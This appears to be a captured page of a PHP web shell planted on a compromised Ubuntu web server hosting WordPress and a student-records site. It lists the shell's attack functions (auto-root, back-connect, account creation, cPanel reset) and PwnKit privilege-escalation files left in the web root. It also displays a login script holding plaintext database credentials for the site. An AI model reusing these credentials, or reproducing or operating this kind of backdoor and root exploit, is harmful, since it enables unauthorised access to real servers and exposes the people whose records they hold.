Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
applications
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
wp-admin
[ DIR ]
drwxrwxr-x
wp-content
[ DIR ]
drwxrwxr-x
wp-includes
[ DIR ]
drwxrwxr-x
.htaccess
523
B
-rwxrwxr-x
.mad-root
0
B
-rw-r--r--
admin_dashboard.php
20.42
KB
-rw-r--r--
admin_login.php
8.62
KB
-rw-r--r--
index.php
405
B
-rwxrwxr-x
license.txt
19.45
KB
-rwxrwxr-x
old-data.tar
381.81
MB
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rwxrwxr-x
student_dashboard.php
24.53
KB
-rw-r--r--
student_form.php
15.23
KB
-rw-r--r--
student_login.php
7.94
KB
-rw-r--r--
student_ranking.php
17.12
KB
-rw-r--r--
wordpress-6.5.5.zip
24.98
MB
-rwxrwxr-x
wp-activate.php
7.21
KB
-rwxrwxr-x
wp-blog-header.php
351
B
-rwxrwxr-x
wp-comments-post.php
2.27
KB
-rwxrwxr-x
wp-config
3.12
KB
-rwxrwxr-x
wp-config-sample.php
2.94
KB
-rwxrwxr-x
wp-config.php
3.21
KB
-rw-rw-rw-
wp-cron.php
5.51
KB
-rwxrwxr-x
wp-links-opml.php
2.44
KB
-rwxrwxr-x
wp-load.php
3.83
KB
-rwxrwxr-x
wp-login.php
49.72
KB
-rwxrwxr-x
wp-mail.php
8.33
KB
-rwxrwxr-x
wp-settings.php
27.76
KB
-rwxrwxr-x
wp-signup.php
33.58
KB
-rwxrwxr-x
wp-trackback.php
4.77
KB
-rwxrwxr-x
xmlrpc.php
3.17
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin_login.php
<?php session_start(); $DEBUG = true; if (!empty($_SESSION['admin_logged_in'])) { header('Location: admin_dashboard.php'); exit; } $conn = new mysqli("localhost", "cipd", "CiPd-CiPd2024", "cipd"); // $conn = new mysqli("localhost", "root", "", "student_db"); if ($conn->connect_error) die("Connection failed: " . $conn->connect_error); $tableCandidates = ['admins', 'admin']; $adminTable = null; foreach ($tableCandidates as $t) { $r = $conn->query("SHOW TABLES LIKE '" . $conn->real_escape_string($t) . "'"); if ($r && $r->num_rows > 0) { $adminTable = $t; break; } } if ($adminTable === null) { die($DEBUG ? "No admin table found." : "Admin table missing."); } $error = ''; $debugInfo = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = trim($_POST['username'] ?? ''); $password = $_POST['password'] ?? ''; if ($username === '' || $password === '') { $error = "Username and password are required."; } else { $sql = "SELECT id, username, password_hash, name FROM `$adminTable` WHERE username = ? LIMIT 1"; $stmt = $conn->prepare($sql); if ($stmt) { $stmt->bind_param("s", $username); $stmt->execute(); $row = null; if (method_exists($stmt, 'get_result')) { $res = $stmt->get_result(); if ($res) $row = $res->fetch_assoc(); } if (!$row) { $stmt->bind_result($id_r, $username_r, $password_hash_r, $name_r); if ($stmt->fetch()) { $row = [ 'id' => $id_r, 'username' => $username_r, 'password_hash' => $password_hash_r, 'name' => $name_r ]; } } if ($row && password_verify($password, $row['password_hash'])) { session_regenerate_id(true); $_SESSION['admin_logged_in'] = true; $_SESSION['admin_id'] = $row['id']; $_SESSION['admin_username'] = $row['username']; $_SESSION['admin_name'] = $row['name'] ?? $row['username']; $stmt->close(); $conn->close(); header('Location: admin_dashboard.php'); exit; } else { $error = "Invalid username or password."; if ($DEBUG && !$row) $debugInfo .= "No row fetched for username: " . htmlspecialchars($username) . "<br>"; } $stmt->close(); } else { $error = "Internal server error."; } } } $conn->close(); ?> <!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Admin Login — Student Form</title> <style> :root{ --bg: #f6f7f9; --card-bg: #ffffff; --muted: #6b7280; --accent: #0b69ff; --accent-2: #0b56d6; --danger: #c9252b; --input-border: #e6e9ef; --shadow: 0 12px 36px rgba(16,24,40,0.08); --radius: 12px; --max-width: 440px; --sans: "Inter", system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; } *{box-sizing:border-box;margin:0;padding:0} html,body{height:100%} body{ font-family:var(--sans); background: var(--bg); color: #0f1724; padding: 28px; display:flex; align-items:center; justify-content:center; } .shell { width:100%; max-width: 980px; display:flex; gap:32px; align-items:center; justify-content:center; } .brand { display:none; width:300px; background: linear-gradient(180deg, rgba(11,105,255,0.06), rgba(11,86,214,0.03)); border-radius: 12px; padding: 28px; box-shadow: var(--shadow); border: 1px solid rgba(11,105,255,0.06); flex-shrink: 0; text-align: left; } .brand .logo { width:56px;height:56px;border-radius:10px;background:linear-gradient(135deg,var(--accent),var(--accent-2)); display:inline-flex;align-items:center;justify-content:center;color:#fff;font-weight:700;font-size:18px;margin-bottom:18px; } .brand h2 { font-size:20px;margin-bottom:8px; color:#07102a; } .brand p { color:var(--muted); font-size:14px; line-height:1.45; } .brand small { display:block;margin-top:18px;color:#9aa3b2;font-size:13px } .card{ width:100%; max-width: var(--max-width); background: var(--card-bg); border-radius: var(--radius); padding: 30px; box-shadow: var(--shadow); border: 1px solid rgba(15,23,42,0.04); } .card h1 { font-size:20px; margin-bottom:6px; color:#07102a; } .card p.lead { color:var(--muted); margin-bottom:18px; font-size:14px } .form-group{margin-bottom:14px} label{display:block;font-weight:600;color:#0f1724;margin-bottom:6px;font-size:13px} input[type="text"],input[type="password"]{ width:100%;padding:12px;border:1px solid var(--input-border);border-radius:10px;background:#fff; transition:all .14s; font-size:14px; color:#0f1724; } input::placeholder{color:#9aa3b2} input:focus{outline:none;border-color:var(--accent);box-shadow:0 6px 18px rgba(11,105,255,0.06)} .btn{ width:100%;padding:12px;border-radius:10px;border:none;background:linear-gradient(180deg,var(--accent),var(--accent-2)); color:#fff;font-weight:700;font-size:15px;cursor:pointer;box-shadow:0 8px 20px rgba(11,105,255,0.12) } .meta-row{display:flex;gap:10px;align-items:center;justify-content:space-between;margin-top:12px} .meta-row .help{font-size:13px;color:#9aa3b2} .small{font-size:13px;color:var(--muted);margin-top:12px;text-align:center} .links a{color:var(--accent);text-decoration:none} .debug {background:#fff8e6;color:#7a531b;padding:10px;border-radius:8px;border:1px solid #ffe8b8;margin-top:12px;font-size:13px} /* Modern Toast Alert */ .toast{position:fixed;top:20px;right:20px;z-index:9999;padding:14px 18px;border-radius:12px;font-weight:600;color:#fff;min-width:220px;box-shadow:0 6px 18px rgba(0,0,0,0.12);opacity:0;transform:translateY(-20px);transition:0.3s;} .toast.show{opacity:1;transform:translateY(0);} .toast.error{background:#dc2626;} .toast.success{background:#16a34a;} @media (min-width: 960px){ .brand { display:block; } } @media (max-width:720px){ .shell { padding:12px; gap:14px; flex-direction:column; align-items:stretch; } .card { padding:20px; } .brand { display:none; } } </style> </head> <body> <div class="shell" role="main" aria-labelledby="admin-title"> <aside class="brand" aria-hidden="true"> <div class="logo">CIPD</div> <p>Secure admin portal for managing student registrations, rankings and records. Use your admin credentials to sign in.</p> <small>Manage students • Upload photos • Moderate likes</small> </aside> <section class="card" aria-labelledby="admin-title"> <h1 id="admin-title">Admin Sign in</h1> <p class="lead">Sign in to manage student records</p> <form method="POST" novalidate> <div class="form-group"> <label for="username">Username</label> <input id="username" name="username" type="text" autocomplete="username" placeholder="admin username" required> </div> <div class="form-group"> <label for="password">Password</label> <input id="password" name="password" type="password" autocomplete="current-password" placeholder="••••••••" required> </div> <button class="btn" type="submit">Sign in</button> </form> <div class="meta-row" aria-hidden="true"> <div class="help">Need help creating an admin user?</div> <div class="small links"><a href="#">Contact support</a></div> </div> <?php if ($DEBUG && !empty($debugInfo)): ?> <div class="debug" role="note"> <strong>DEBUG:</strong><br> <?php echo $debugInfo; ?> </div> <?php endif; ?> </section> </div> <!-- Toast Container --> <div id="toast-container"></div> <script> function showToast(message, type='error'){ const toast=document.createElement('div'); toast.className=`toast ${type} show`; toast.textContent=message; document.body.appendChild(toast); setTimeout(()=>{toast.classList.remove('show'); toast.remove();},4000); } <?php if($error): ?> showToast("<?= addslashes($error) ?>",'error'); <?php endif; ?> </script> </body> </html>
Close